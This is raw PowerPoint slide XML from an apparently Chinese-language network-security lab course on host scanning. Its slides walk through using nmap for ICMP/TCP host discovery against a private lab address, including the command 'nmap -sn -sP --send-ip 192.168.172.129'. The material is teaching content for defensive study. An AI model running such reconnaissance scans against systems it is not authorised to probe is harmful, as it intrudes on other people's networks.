              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤四</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="文本框 123"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5755005" y="932498"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4.目标主机响应了一个ICMP包，告诉nmap端口信息不可达，如图2-2-20所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5755005" y="1577658"/>
            <a:ext cx="5267325" cy="3590925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="文本框 124"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5755005" y="5168583"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-20 响应的ICMP包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行ICMP和TCP协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤五</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>05</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="文本框 124"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5741035" y="1626870"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.使用“nmap -sn -sP --send-ip 192.168.172.129”命令进行主机发现，“-sP”参数表示使用ICMP和TCP协议进行扫描，如图2-2-21所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5741035" y="2548890"/>
            <a:ext cx="5276850" cy="1314450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="文本框 125"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5741035" y="3863340"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-21 使用-sP参数进行扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行ICMP和TCP协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
